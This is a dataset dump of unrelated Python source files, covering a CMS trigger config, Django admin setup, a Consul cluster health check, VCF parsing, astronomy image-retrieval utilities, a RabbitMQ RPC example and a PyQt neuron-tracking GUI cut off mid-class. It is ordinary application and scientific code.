content
stringlengths 5
1.05M
|
|---|
import FWCore.ParameterSet.Config as cms
from L1Trigger.TrackTrigger.ProducerSetup_cfi import TrackTrigger_params
TrackTriggerSetup = cms.ESProducer("tt::ProducerSetup", TrackTrigger_params)
|
from django.contrib import admin
# Register your models here.
from .models import UserInfo, Owns, Balance, Ticket
admin.site.register(UserInfo)
admin.site.register(Owns)
admin.site.register(Balance)
admin.site.register(Ticket)
|
#!/usr/bin/env python2
from __future__ import print_function
import sys
import json
import base64
from time import sleep
import urllib2
import ssl
import subprocess
def get_credentials():
""" Get consul api password from security.yml """
# TODO: is this the correct YAML key for the Consul API password?
yaml_key = "nginx_admin_password:"
try:
with open('security.yml') as f:
for line in f:
if yaml_key in line:
# credentials are the whole string after the key
password = line[len(yaml_key):].strip()
# only grab what we need
return "admin:"+password
except IOError:
# Returning "" ensures that unit tests will run network code, rather
# than just failing because security.yml isn't present.
return ""
def get_hosts_from_json(json_str, role="control"):
""" Get a list of IP addresses of hosts with a certain role from a JSON
string """
ips = []
json_dic = json.loads(json_str)
host_data = json_dic["_meta"]["hostvars"]
for key, dic in host_data.iteritems():
if dic.get("role", "").lower() == role:
ips.append(dic["public_ipv4"])
return ips
def get_hosts_from_dynamic_inventory(cmd, role="control"):
""" Get a list of IP addresses of control hosts from terraform.py """
proc = subprocess.Popen(cmd, stdout=subprocess.PIPE)
rc = proc.wait()
if rc != 0:
print("terraform.py exited with ", rc)
return []
else:
return get_hosts_from_json(proc.stdout.read())
def node_health_check(node_address):
""" Return a boolean: if a node passes all of its health checks """
# Create a context that doesn't validate SSL certificates, since Mantl's
# are self-signed.
ctx = ssl.create_default_context()
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
url = "https://" + node_address + "/consul/v1/health/state/any"
request = urllib2.Request(url)
auth = b'Basic ' + base64.b64encode(get_credentials())
request.add_header("Authorization", auth)
try:
f = urllib2.urlopen(request, None, 30, context=ctx)
health_checks = json.loads(f.read().decode('utf8'))
for check in health_checks:
if check['Status'] != "passing":
print(check['Name'] + ": " + check['Status'])
return False
except Exception as e:
print("Check at IP ", node_address, " exited with this error\n", e)
return False
return True
def cluster_health_check(ip_addresses):
""" Return an integer representing how many nodes failed """
failed = 0
for ip in ip_addresses:
passed = node_health_check(ip)
print("Node ", ip, " ", "passed" if passed else "failed")
failed += 0 if passed else 1
return failed
if __name__ == "__main__":
print("Waiting for cluster to finalize init before starting health checks")
sleep(60*2) # two minutes
# Get IP addresses of hosts from a dynamic inventory script
cmd = ["python2", "plugins/inventory/terraform.py", "--list"]
address_list = get_hosts_from_dynamic_inventory(cmd)
if len(address_list) == 0:
print("terraform.py reported no control hosts.")
sys.exit(1)
failed = cluster_health_check(address_list)
sys.exit(0 if failed == 0 else 1)
|
# Utils for dealing with VCF generated by nextstrain.py, with a particular style of ID
# and clades appearing in genotypes...
from collections import defaultdict
def readVcfSampleClades(vcfFile):
"""Read VCF sample IDs from the #CHROM line, and parse out clades from the first row GT cols"""
samples = []
sampleClades = defaultdict()
with open(vcfFile, 'r') as vcfF:
line = vcfF.readline().strip()
while (line):
if (line.startswith('#CHROM')):
samples = line.split('\t')[9:]
elif (not line.startswith('#')):
gts = line.split('\t')[9:]
if (len(gts) != len(samples)):
die("VCF file '%s' has %d samples but %d genotypes in first row" %
(vcfFile, len(samples), len(gts)));
for sample, gt in zip(samples, gts):
gtVal, clade = gt.split(':')
sampleClades[sample] = clade
break
line = vcfF.readline().strip()
vcfF.close()
return samples, sampleClades
|
from astropy.coordinates import jparser
from io import BytesIO
import urllib.request
import logging
import re
from pathlib import Path
import numbers
import numpy as np
from astropy.io import fits
from astropy.time import Time
from astropy.coordinates import SkyCoord, EarthLocation, UnknownSiteException
from astropy.coordinates.name_resolve import NameResolveError
from recipes import caches
# from motley.profiling.timers import timer
from recipes.logging import get_module_logger
# module level logger
logger = get_module_logger()
logging.basicConfig()
# persistent caches for faster object coordinate and image retrieval
cachePath = Path.home() / '.cache/obstools' # NOTE only for linux!
cooCachePath = cachePath / 'coords.pkl'
siteCachePath = cachePath / 'sites.pkl'
dssCachePath = cachePath / 'dss.pkl'
skyCachePath = cachePath / 'skymapper.pkl'
RGX_DSS_ERROR = re.compile(br'(?s)(?i:error).+?<PRE>\s*(.+)\s*</PRE>')
def int2tup(v):
"""wrap integer in a tuple"""
if isinstance(v, numbers.Integral):
return v,
else:
return tuple(v)
# else:
# raise ValueError('bad item %s of type %r' % (v, type(v)))
@caches.to_file(siteCachePath)
def get_site(name):
"""resolve site name and cache the result"""
if isinstance(name, EarthLocation):
return name
try:
return EarthLocation.of_site(name)
except UnknownSiteException:
pass
# try resolve as an address. NOTE this will almost always return a
# location, even for something that is obviously crap like 'Foo' or 'Moo'
loc = EarthLocation.of_address(name)
loc.info.name = name
return loc
# if raises is warns is silent is None:
# raises = True # default behaviour : raise TypeError
# if raises:
# emit = bork(TypeError)
# elif warns:
# emit = warnings.warn
# elif silent:
# emit = _echo # silently ignore
# emit=bork(TypeError)
def get_coordinates(name_or_coords):
"""
Get object coordinates from object name or string of coordinates. If the
coordinates could not be resolved, return None
Parameters
----------
name_or_coords : str or SkyCoord, optional
The object name or coordinates (right ascention, declination) as a str
that be resolved by SkyCoord, or a SkyCoord object.
Returns
-------
astropy.coordinates.SkyCoord or None
"""
if isinstance(name_or_coords, SkyCoord):
return name_or_coords
try:
# first try interpret coords.
if len(name_or_coords) == 2:
# a 2-tuple. hopefully ra, dec
return SkyCoord(*name_or_coords, unit=('h', 'deg'))
# might also be a single coordinate string
# eg. '06:14:51.7 -27:25:35.5'
return SkyCoord(name_or_coords, unit=('h', 'deg'))
except ValueError: # as err:
return get_coords_named(name_or_coords)
def get_coords_named(name):
"""
Attempts to retrieve coordinates from name, first by parsing the name, or by
doing SIMBAD Sesame query for the coordinates associated with name.
Parameters
----------
name : str
The object name
Examples
--------
>>> get_coords_named('MASTER J061451.7-272535.5')
>>> get_coords_named('UZ For')
"""
try:
coo = resolver(name)
except NameResolveError as err: # AttributeError
logger.warning(
'Coordinates for object %r could not be retrieved due to the '
'following exception: \n%s', name, str(err))
else:
if isinstance(coo, SkyCoord):
logger.info(
'The following ICRS J2000.0 coordinates were retrieved:\n'
+ ra_dec_string(coo, precision=2, sep=' ', pad=1)
)
return coo
@caches.to_file(cooCachePath)
def resolver(name):
"""
Get the target coordinates from object name if known. This function is
decorated with the `memoize.to_file` decorator, which caches all previous
database lookups. This allows offline usage for repeat queries of the same
name while also offering a performance improvement for this case.
Parameters
----------
name : str
object name
Returns
-------
coords: astropy.coordinates.SkyCoord
"""
# try parse J coordinates from name. We do this first, since it is
# faster than a sesame query
try: # EAFP
return jparser.to_skycoord(name)
except ValueError as err:
logger.debug('Could not parse coordinates from name %r.', name)
try:
# Attempts a SIMBAD Sesame query with the given object name
logger.info('Querying SIMBAD database for %r.', name)
return SkyCoord.from_name(name)
except NameResolveError as err:
# check if the name is bad - something like "FLAT" or "BIAS", we want
# to cache these bad values also to avoid multiple sesame queries for
# bad values like these
if str(err).startswith("Unable to find coordinates for name"):
return None
# If we are here, it probably means there is something wrong with the
# connection:
# NameResolveError: "All Sesame queries failed."
raise
def convert_skycoords(ra, dec):
"""Try convert ra dec to SkyCoord"""
if ra and dec:
try:
return SkyCoord(ra=ra, dec=dec, unit=('h', 'deg'))
except ValueError:
logger.warning(
'Could not interpret coordinates: %s; %s' % (ra, dec))
def retrieve_coords_ra_dec(name, verbose=True, **fmt):
"""return SkyCoords and str rep for ra and dec"""
coords = get_coords_named(name)
if coords is None:
return None, None, None
default_fmt = dict(precision=2, sep=' ', pad=1)
fmt.update(default_fmt)
ra = coords.ra.to_string(unit='h', **fmt)
dec = coords.dec.to_string(unit='deg', alwayssign=1, **fmt)
return coords, ra, dec
def ra_dec_string(coords, **kws):
kws_ = dict(precision=2, sep=' ', pad=1)
kws_.update(**kws)
return 'α = %s; δ = %s' % (
coords.ra.to_string(unit='h', **kws_),
coords.dec.to_string(unit='deg', alwayssign=1, **kws_))
def get_skymapper_table(coords, bands, size=(10, 10)):
# http://skymapper.anu.edu.au/about-skymapper/
# http://skymapper.anu.edu.au/how-to-access/#public_cutout
url = 'http://api.skymapper.nci.org.au/public/siap/dr1/query?'
bands = set(bands.lower())
assert not (bands - set('uvgriz'))
# encode payload for the php form
params = urllib.parse.urlencode(
dict(POS=coords.to_string().replace(' ', ','),
BAND=','.join(bands),
SIZE=','.join(np.divide(size, 60).astype(str)),
VERB=0, # verbosity for the table
INTERSECT='covers',
RESPONSEFORMAT='TSV',
)).encode()
# submit the form
# req = urllib.request.Request(url)
raw = urllib.request.urlopen(url, params).read()
columns, *data = (l.split(b'\t') for l in raw.split(b'\n')[:-1])
data = np.array(data)
t = Time(data[:, columns.index(b'mjd_obs')].astype(str), format='mjd')
logger.info('Found %i %s-band SkyMapper DR1 images for coordinates %s '
'spanning dates %s to %s',
len(data), bands,
ra_dec_string(coords, precision=2, sep=' ', pad=1),
t.min().iso.split()[0], t.max().iso.split()[0])
return columns, data
def get_skymapper(coords, bands, size=(10, 10), combine=True,
most_recent_only=False):
"""
Get combined sky-mapper image
"""
columns, data = get_skymapper_table(coords, bands, size)
urls = data[:, columns.index(b'get_fits')].astype(str)
if most_recent_only:
t = data[:, columns.index(b'mjd_obs')].astype(float)
urls = [urls[t.argmin()]]
# retrieve data possibly from cache
logger.info('Retrieving images...')
hdus = [_get_skymapper(url) for url in urls]
return hdus
@caches.to_file(skyCachePath) # memoize for performance
def _get_skymapper(url):
# get raw image data
logger.debug(f'Reading data from {url=}')
raw = urllib.request.urlopen(url).read()
# load into fits
fitsData = BytesIO()
fitsData.write(raw)
fitsData.seek(0)
return fits.open(fitsData, ignore_missing_end=True)
# @timer
@caches.to_file(dssCachePath) # memoize for performance
def get_dss(server, ra, dec, size=(10, 10), epoch=2000):
"""
Grab a image from STScI server and load as HDUList.
See [survey description]_.
Parameters
----------
server
ra
dec
size: Field of view size in 'arcmin'
epoch
Returns
-------
`astropy.io.fits.hdu.HDUList`
`survey description: <http://gsss.stsci.edu/SkySurveys/DSS%20Description.htm>`_
"""
# , urllib.error, urllib.parse
# see: http://gsss.stsci.edu/SkySurveys/Surveys.htm
known_servers = ('all',
'poss2ukstu_blue',
'poss1_blue',
'poss2ukstu_red',
'poss1_red',
'poss2ukstu_ir',
'quickv'
) # TODO: module scope ?
if not server in known_servers:
raise ValueError('Unknown server: %s. Please select from: %s'
% (server, str(known_servers)))
# resolve size
h, w = size # FIXME: if number
# make url
url = 'https://archive.stsci.edu/cgi-bin/dss_search?'
# encode payload for the php form
params = urllib.parse.urlencode(
dict(v=server,
r=ra, d=dec,
e=f'J{epoch}',
h=h, w=w,
f='fits',
c='none')).encode()
# submit the form
with urllib.request.urlopen(url, params) as html:
raw = html.read()
# parse error message
error = RGX_DSS_ERROR.search(raw)
if error:
raise STScIServerError(error[1])
# log
logger.info("Retrieving %s'x %s' image for object at J%.1f coordinates "
"RA = %.3f; DEC = %.3f from %r", h, w, epoch, ra, dec, server)
# load into fits
fitsData = BytesIO()
fitsData.write(raw)
fitsData.seek(0)
return fits.open(fitsData, ignore_missing_end=True)
class STScIServerError(Exception):
pass
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
import pika
# 加入验证,不加默认user=guser,password=guser
credentials = pika.PlainCredentials(username="admin", password="123")
# 构造链接对象
connection = pika.BlockingConnection(
pika.ConnectionParameters(
host="192.168.1.100", # 交换机ip
port=5672, # 队列端口
virtual_host="/test", # 虚拟对象
credentials=credentials, # 导入密码
))
# channel信道
channel = connection.channel()
# 建立一个专属队列
channel.queue_declare(queue='rpc_queue')
# 构造斐波那契函数求和
def fib(n):
if n == 0:
return 0
elif n == 1:
return 1
else:
return fib(n - 1) + fib(n - 2)
# 回调函数
def on_request(ch, method, props, body):
# 将字符串转为10进制
n = int(body)
"""
服务端和客户端,通过ch.basic_publish
互相
"""
# 输出客户端的值
print("得到值:", str(n))
# 得到斐波那契
response = fib(n)
# 这里还能再发个值返回客户端
ch.basic_publish(
exchange='',
routing_key=props.reply_to,
properties=pika.BasicProperties(correlation_id=props.correlation_id),
body=str(response))
# 手动消息确认
ch.basic_ack(delivery_tag=method.delivery_tag)
"""
您可能已经注意到调度仍然不能完全按照我们的意愿工作。例如,在有两个工人的情况下,当所有奇数消息很重而偶数消息都很轻时,一个工人将一直很忙,另一个工人几乎不做任何工作。好吧,RabbitMQ 对此一无所知,仍然会均匀地发送消息。
发生这种情况是因为 RabbitMQ 只是在消息进入队列时分派消息。
它不查看消费者未确认消息的数量。它只是盲目地将第 n 个消息发送给第 n 个消费者。
为了解决这个问题,我们可以使用带有prefetch_count=1设置的Channel#basic_qos通道方法 。
相反,它将把它分派给下一个不忙的工人.
除了改变channel的调度计划外
1.加入更多的消费者
2.使用消息TTL(生存时间和到期时间,消息时效性)
"""
channel.basic_qos(prefetch_count=1)
# 信道接收
channel.basic_consume(queue='rpc_queue', on_message_callback=on_request)
print("服务端启动")
# 开始阻塞
channel.start_consuming()
|
from PyQt5 import QtGui
from PyQt5.QtWidgets import *
from PyQt5.QtCore import Qt
from PyQt5.QtGui import QPainter
from PyQt5.QtCore import QRect, QPoint, Qt
from pyqtgraph.parametertree import Parameter, ParameterTree
from ..helpers import QtHelpers
from ..parameters.parameters import Parameters
from typing import Dict
import numpy as np
#CFP added for integration
from src.methods import tracking_methods
from multiprocessing import Process,Pipe
class NeuronBar(QScrollArea):
"""
This is the bar at the top, with the list of identified neurons and the key assigned to them
"""
def __init__(self, controller, reserved_keys=None):
"""
:param controller: main controller to report to
:param reserved_keys: keys that may not be assigned as neuron keys (they are used by main gui as specific commands)
"""
super().__init__()
self.controller = controller
self.controller.neuron_keys_registered_clients.append(self)
self.controller.nb_neuron_registered_clients.append(self)
self.controller.present_neurons_registered_clients.append(self)
self.controller.highlighted_neuron_registered_clients.append(self)
if reserved_keys is None:
reserved_keys = []
self.reserved_keys = reserved_keys
self.removed_holder = QWidget() # a holder, not displayed, to keep alive the widgets removed from other layouts
self.setWidgetResizable(True)
dummy = QWidget()
self.neuron_bar_holderLayout = QHBoxLayout()
self.separator = QLabel("|")
self.unactivated_contents = QGridLayout()
self.activated_contents = QGridLayout()
self.neuron_bar_holderLayout.addLayout(self.activated_contents)
self.neuron_bar_holderLayout.addWidget(self.separator)
self.neuron_bar_holderLayout.addLayout(self.unactivated_contents)
dummy.setLayout(self.neuron_bar_holderLayout)
self.setWidget(dummy)
self.neurons = {}
self.keyed_neurons_from1 = set() # set of neurons that have a key displayed
self.setContentsMargins(0, 0, 0, 0)
self.neuron_bar_holderLayout.setSpacing(0)
def change_neuron_keys(self, changes:list):
"""
Changes (or sets if no previously existing, or deletes if key not given) the keys displayed for given neurons.
:param changes: list of (neuron_idx_from1, new_key). For each such pair, new_key will be displayed instead of
previous display for the neuron neuron_idx_from1. If the key is None, then no key will be displayed.
"""
for neuron_idx_from1, key in changes:
if key is None:
self.neurons[neuron_idx_from1].set_text(" ")
self.keyed_neurons_from1.discard(neuron_idx_from1)
else:
self.neurons[neuron_idx_from1].set_text(key)
self.keyed_neurons_from1.add(neuron_idx_from1)
self._restore_activated_neurons()
def _restore_activated_neurons(self):
"""
Re-creates the activated_neuron_bar_contents (a bar with only the neurons that have a key assigned??)
"""
# First remove all buttons from the layouts
for lay in [self.activated_contents, self.unactivated_contents]:
for i in range(lay.count() - 1, -1, -1):
item = lay.itemAt(i)
if item.widget() is not None:
item.widget().setParent(self.removed_holder) # or lay.removeItem(item) would be enough?
# Then put every button in the right layout (activated or inactivated)
for i_from1 in sorted(self.neurons.keys()):
if i_from1 in self.keyed_neurons_from1:
self.neurons[i_from1].install_in(self.activated_contents)
else:
self.neurons[i_from1].install_in(self.unactivated_contents)
def change_nb_neurons(self, nb_neurons):
"""
Changes the number of neurons in the neuron bar.
:param nb_neurons: new number of neurons
"""
old_n_neurons = len(self.neurons)
if nb_neurons > old_n_neurons:
for i_from1 in range(old_n_neurons+1, nb_neurons+1):
self.neurons[i_from1] = NeuronBarItem(i_from1, self)
self.neurons[i_from1].install_in(self.unactivated_contents)
elif nb_neurons < old_n_neurons:
for i_from1 in range(nb_neurons+1, old_n_neurons+1):
self.neurons[i_from1].delete()
del self.neurons[i_from1]
self._restore_activated_neurons()
def _make_user_neuron_key(self, neuron_id_from1):
"""
Asks the user a key to assign to neuron neuron_id_from1 and notifies self.controller
"""
def fun():
text, ok = QInputDialog.getText(self, 'Select key for neuron ' + str(neuron_id_from1), 'Key: ')
# Todo AD: should the parent not be the main gui rather than self??
if not ok:
return
if len(text) == 0:
text = None
elif len(text) != 1 or (text in self.reserved_keys):
errdial = QErrorMessage()
errdial.showMessage('Invalid key')
errdial.exec_()
return
self.controller.assign_neuron_key(neuron_id_from1, text)
return fun
def _make_neuron_highlight(self, i_from1):
def fun():
self.controller.highlight_neuron(i_from1)
return fun
def change_present_neurons(self, present=None, added=None, removed=None):
"""
Changes which of the neurons are present in current frame, as their corresponding buttons should be colored
in blue instead of red.
:param present: which neuron indices (from 1) are present, if given
:param added: single neuron index (from 1) that was added, if given
:param removed: single neuron index (from 1) that was removed, if given
"""
# todo: don't reset all style sheet of all neurons every time?
if present is not None:
for i_from1, neu in self.neurons.items():
if i_from1 in present:
neu.set_present()
else:
neu.set_absent()
return
if added is not None:
self.neurons[added].set_present()
if removed is not None:
self.neurons[removed].set_absent()
def change_highlighted_neuron(self, high: int=None, unhigh:int=None,
**kwargs):
"""
Highlights or unhighlights neuron buttons.
:param high: neuron id (from 1), will be highlighted if given
:param unhigh: neuron id (from 1), will be unhighlighted if given
"""
if high is not None:
self.neurons[high].highlight()
if unhigh is not None:
self.neurons[unhigh].unhighlight()
class NeuronBarItem:
"""
This is one neuron in the neuron bar. It contains the colored button with the neuron id (from1), and the key button.
"""
qss = """
QPushButton{
height: 10px;
min-height: 10px;
width: 10px;
min-width: 40px;
}
QPushButton[color = "a"]{
background-color: red;
}
QPushButton[color = "p"]{
background-color: blue;
}
QPushButton[color = "hp"]{
background-color: green;
}
QPushButton[color = "ha"]{
background-color: orange;
}
"""
# Could also have: border-radius: 4px;
def __init__(self, i_from1, parent):
super().__init__()
self.i_from1 = i_from1
self.parent = parent
self.neuron_key_button = QPushButton(" ")
self.neuron_key_button.setStyleSheet(self.qss)
self.neuron_key_button.clicked.connect(self.parent._make_user_neuron_key(self.i_from1))
self.neuron_button = QPushButton(str(self.i_from1))
self.neuron_button.setStyleSheet(self.qss) # TODO set correct color NOW??
self.neuron_button.clicked.connect(self.parent._make_neuron_highlight(self.i_from1))
self.present = False # Todo: set at init??
self.highlighted = False # Todo: set at init??
def install_in(self, holder_layout):
j = holder_layout.count() // 2 # this is the number of items already in the layout; there are two per neuron
# already installed (the button and the key button). We add self after the neurons already present.
holder_layout.addWidget(self.neuron_key_button, 0, j)
holder_layout.addWidget(self.neuron_button, 1, j)
def set_present(self):
self.present = True
if self.highlighted:
self.neuron_button.setProperty("color", "hp")
else:
self.neuron_button.setProperty("color", "p")
self.neuron_button.setStyle(self.neuron_button.style()) # for some reason this is needed to actually change the color
def set_absent(self):
self.present = False
if self.highlighted:
self.neuron_button.setProperty("color", "ha")
else:
self.neuron_button.setProperty("color", "a")
self.neuron_button.setStyle(self.neuron_button.style()) # for some reason this is needed to actually change the color
def highlight(self):
self.highlighted = True
if self.present:
self.neuron_button.setProperty("color", "hp")
else:
self.neuron_button.setProperty("color", "ha")
self.neuron_button.setStyle(self.neuron_button.style()) # for some reason this is needed to actually change the color
def unhighlight(self):
self.highlighted = False
if self.present:
self.neuron_button.setProperty("color", "p")
else:
self.neuron_button.setProperty("color", "a")
self.neuron_button.setStyle(self.neuron_button.style()) # for some reason this is needed to actually change the color
def set_text(self, text):
self.neuron_key_button.setText(text)
def delete(self):
self.neuron_key_button.setParent(None)
self.neuron_button.setParent(None)
del self
class DashboardItem(QPushButton):
qss = """
QPushButton{
border-radius: 4px;
}
QPushButton[color = "a"]{
background-color: red;
}
QPushButton[color = "p"]{
background-color: blue;
}
"""
def __init__(self, i_from1, callback):
super().__init__()
self.i_from1 = i_from1
self.clicked.connect(callback)
self.present = False # Todo: set at init??
self.setStyleSheet(self.qss)
def set_present(self):
self.present = True
self.setProperty("color", "p")
self.setStyle(self.style()) # for some reason this is needed to actually change the color
def set_absent(self):
self.present = False
self.setProperty("color", "a")
self.setStyle(self.style()) # for some reason this is needed to actually change the color
class ViewTab(QScrollArea):
"""
This is the tab that controls viewing parameters
"""
def __init__(self, controller, controlled_plot, default_values: Dict[str, bool]):
"""
:param controller: main controller to report to
:param controlled_plot: the instance of ImageRendering that is controlled by the commands in this tab
:param default_values: dictionary (string->bool) for whether some check buttons should be checked.
Should include "just_show_first_channel", "autolevels" and "overlay_mask_by_default".
"""
super(ViewTab, self).__init__()
self.controller = controller
self.controlled_plot = controlled_plot
as_points = self.controller.point_data
view_tab_grid = QGridLayout()
row = 0
view_checkboxes_lay = QGridLayout()
first_channel_only_checkbox = QCheckBox("Show only first channel")
first_channel_only_checkbox.setChecked(int(default_values["just_show_first_channel"]))#MB changed bool to int
first_channel_only_checkbox.toggled.connect(self.controller.toggle_first_channel_only)
view_checkboxes_lay.addWidget(first_channel_only_checkbox, 0, 0)
second_channel_only_checkbox = QCheckBox("Show only second channel")
if first_channel_only_checkbox:
second_channel_only_checkbox.setChecked(0)#MB changed bool to int
second_channel_only_checkbox.toggled.connect(self.controller.toggle_second_channel_only)
view_checkboxes_lay.addWidget(second_channel_only_checkbox, 0, 1)
autolevels_checkbox = QCheckBox("Autolevels")
autolevels_checkbox.setChecked(int(self.controlled_plot.figure.autolevels))
autolevels_checkbox.toggled.connect(self.controlled_plot.change_autolevels)
view_checkboxes_lay.addWidget(autolevels_checkbox, 0, 2)
view_tab_grid.addLayout(view_checkboxes_lay, row, 0)
row += 1
gamma_lay = QVBoxLayout()
gamma_slider = QSlider(Qt.Horizontal)
gamma_slider.setMinimum(1)
gamma_slider.setMaximum(100)
gamma_slider.setValue(40)
gamma_slider.valueChanged.connect(lambda val: self.controlled_plot.change_gamma(val))
gamma_lay.addWidget(QLabel("Gamma"))
gamma_lay.addWidget(gamma_slider)
view_tab_grid.addLayout(gamma_lay, row, 0)
row += 1
blend_slider_lay = QGridLayout()
blend_slider_lay.addWidget(QLabel("Blender Red"), 0, 0)
blend_slider_lay.addWidget(QLabel("Blender Green"), 0, 1)
blend_slider_r = QSlider(Qt.Horizontal)
blend_slider_r.setMinimum(0)
blend_slider_r.setMaximum(100)
blend_slider_r.setValue(100)
blend_slider_r.valueChanged.connect(lambda val: self.controlled_plot.change_blend_r(val))
blend_slider_lay.addWidget(blend_slider_r, 1, 0)
blend_slider_g = QSlider(Qt.Horizontal)
blend_slider_g.setMinimum(0)
blend_slider_g.setMaximum(100)
blend_slider_g.setValue(100)
blend_slider_g.valueChanged.connect(lambda val: self.controlled_plot.change_blend_g(val))
blend_slider_lay.addWidget(blend_slider_g, 1, 1)
view_tab_grid.addLayout(blend_slider_lay, row, 0)
row += 1
thres_slider_lay = QGridLayout()
thres_slider_lay.addWidget(QLabel("Threshold Low"), 0, 0)
thres_slider_lay.addWidget(QLabel("Threshold High"), 0, 1)
thres_slider_l = QSlider(Qt.Horizontal)
thres_slider_l.setMinimum(0)
thres_slider_l.setMaximum(100)
thres_slider_l.setValue(0)
thres_slider_l.valueChanged.connect(lambda val: self.controlled_plot.change_low_thresh(val))
thres_slider_h = QSlider(Qt.Horizontal)
thres_slider_h.setMinimum(0)
thres_slider_h.setMaximum(100)
thres_slider_h.setValue(100)
thres_slider_h.valueChanged.connect(lambda val: self.controlled_plot.change_high_thresh(val))
thres_slider_lay.addWidget(thres_slider_l, 1, 0)
thres_slider_lay.addWidget(thres_slider_h, 1, 1)
view_tab_grid.addLayout(thres_slider_lay, row, 0)
row += 1
if as_points:
# view_tab_grid.addWidget(QLabel("------------ Point mode ------------"), row, 0)
# row += 1
first_lay = QGridLayout()
curr_CheckBox = QCheckBox("Overlay Current Points")
curr_CheckBox.setChecked(True)
curr_CheckBox.toggled.connect(self.controller.toggle_pts_overlay)
first_lay.addWidget(curr_CheckBox, 0, 0)
NN_CheckBox = QCheckBox("Overlay NN Prediction")
NN_CheckBox.setChecked(True)
NN_CheckBox.toggled.connect(self.controller.toggle_NN_overlay)
first_lay.addWidget(NN_CheckBox, 0, 1)
view_tab_grid.addLayout(first_lay, row, 0)
row += 1
overlay_tracks_lay = QGridLayout()
overlay_tracks_CheckBox = QCheckBox("Overlay Tracks")
overlay_tracks_CheckBox.setChecked(True)
overlay_tracks_CheckBox.toggled.connect(self.controller.toggle_track_overlay)
overlay_tracks_lay.addWidget(overlay_tracks_CheckBox, 0, 0, 1, 2)
ov_tr_past = QLineEdit("-5")
ov_tr_past.setStyleSheet("height: 15px; width: 5px;min-width: 5px;")
ov_tr_past.setValidator(QtGui.QIntValidator(-15, 0))
ov_tr_past.textChanged.connect(lambda x: self.controller.change_track_past(x))
ov_tr_future = QLineEdit("5")
ov_tr_future.setStyleSheet("height: 15px; width: 5px;min-width: 5px;")
ov_tr_future.setValidator(QtGui.QIntValidator(0, 15))
ov_tr_future.textChanged.connect(lambda x: self.controller.change_track_future(x))
overlay_tracks_lay.addWidget(QLabel("Past"), 1, 0)
overlay_tracks_lay.addWidget(QLabel("Future"), 1, 1)
overlay_tracks_lay.addWidget(ov_tr_past, 2, 0)
overlay_tracks_lay.addWidget(ov_tr_future, 2, 1)
view_tab_grid.addLayout(overlay_tracks_lay, row, 0)
row += 1
adjLayout = QHBoxLayout()
getadj = QLineEdit("-1")
getadj.setValidator(QtGui.QIntValidator(-10, 10))
getadj.textChanged.connect(lambda x: self._adjacent_changed(x))
self.getadjlab = QLabel("-1")
adj_CheckBox = QCheckBox("Overlay Adjacent Points")
adj_CheckBox.toggled.connect(self.controller.toggle_adjacent_overlay)
adjLayout.addWidget(adj_CheckBox)
adjLayout.addWidget(getadj)
adjLayout.addWidget(self.getadjlab)
view_tab_grid.addLayout(adjLayout, row, 0)
row += 1
else:
# view_tab_grid.addWidget(QLabel("------------ Mask mode ------------"), row, 0)
# row += 1
# SJR: I copied the code from above and got rid of point-specific stuff
mask_boxes = QGridLayout()
mask_checkbox = QCheckBox("Overlay Mask")
mask_checkbox.setChecked(int(default_values["overlay_mask_by_default"]))
mask_checkbox.toggled.connect(self.controller.toggle_mask_overlay)
mask_boxes.addWidget(mask_checkbox, 0, 0)
# MB: the following 3 lines si for overlaying the NN mask
NNmask_checkbox = QCheckBox("Only NN mask")
NNmask_checkbox.setChecked(False)
NNmask_checkbox.toggled.connect(self.controller.toggle_NN_mask_only)
mask_boxes.addWidget(NNmask_checkbox, 0, 1)
aligned_checkbox = QCheckBox("Aligned")
aligned_checkbox.setChecked(False)
aligned_checkbox.toggled.connect(self.controller.toggle_display_alignment)
mask_boxes.addWidget(aligned_checkbox, 0, 2)
cropped_checkbox = QCheckBox("Cropped")
cropped_checkbox.setChecked(False)
cropped_checkbox.toggled.connect(self.controller.toggle_display_cropped)
mask_boxes.addWidget(cropped_checkbox, 0, 3)
view_tab_grid.addLayout(mask_boxes, row, 0)
row += 1
# SJR: code below is for blurring button and slider
blur_checkbox = QCheckBox("Blur image")
blur_checkbox.toggled.connect(self.controlled_plot.change_blur_image)
view_tab_grid.addWidget(blur_checkbox, row, 0)
row += 1
blur_slider_lay = QGridLayout()
blur_slider_lay.addWidget(QLabel("Blur sigm parameter"), 0, 0)
blur_slider_lay.addWidget(QLabel("Blur bg_factor parameter"), 0, 1)
blur_slider_s = QSlider(Qt.Horizontal)
blur_slider_s.setMinimum(1)
blur_slider_s.setMaximum(10)
blur_slider_s.setValue(1)
blur_slider_s.valueChanged.connect(lambda val: self.controlled_plot.change_blur_s(val))
blur_slider_lay.addWidget(blur_slider_s, 1, 0)
blur_slider_b = QSlider(Qt.Horizontal)
blur_slider_b.setMinimum(0)
blur_slider_b.setMaximum(100)
blur_slider_b.setValue(25)
blur_slider_b.valueChanged.connect(lambda val: self.controlled_plot.change_blur_b(val))
blur_slider_lay.addWidget(blur_slider_b, 1, 1)
view_tab_grid.addLayout(blur_slider_lay, row, 0)
row += 1
# SJR: code above is for blurring button and slider
self.setWidgetResizable(True)
self.setContentsMargins(5, 5, 5, 5)
lay = QWidget()
lay.setLayout(view_tab_grid)
self.setWidget(lay)
self.setWidgetResizable(True)
self.setContentsMargins(5, 5, 5, 5)
# Todo no sideways scrolling
def _adjacent_changed(self, value):
ok = self.controller.change_adjacent(value)
if ok:
self.getadjlab.setText(str(int(value)))
class AnnotationTab(QScrollArea):
"""
This is the tab with point and mask annotation tools
"""
def __init__(self, controller, frame_num:int, mask_threshold_for_new_region):
"""
:param controller: main controller to report to
:param frame_num: number of frames in video
"""
super().__init__()
self.controller = controller
self.controller.highlighted_neuron_registered_clients.append(self)
self.controller.mask_thres_registered_clients.append(self)
self.controller.autocenter_registered_clients.append(self)
as_points = self.controller.point_data
self.as_points = as_points
main_layout = QGridLayout()
row = 0
if as_points:
# points_lab = QLabel("------------ Point mode ------------")
# main_layout.addWidget(points_lab, row, 0)
# row += 1
subrow = 0
approve_lay = QGridLayout()
self.approve_lab = QLabel("Approve")
approve_lay.addWidget(self.approve_lab, subrow, 0)
subrow += 1
self.delete_clear = QPushButton("Clear This frame")
self.delete_clear.setStyleSheet("background-color: red")
self.delete_clear.clicked.connect(self.controller.clear_frame_NN)
approve_lay.addWidget(self.delete_clear, subrow, 0)
subrow += 1
self.delete_select = QPushButton("Delete Within")
self.delete_select.setStyleSheet("background-color: red")
self.delete_select.clicked.connect(self._selective_delete)
self.delete_select.setEnabled(False)
approve_lay.addWidget(self.delete_select, subrow, 0)
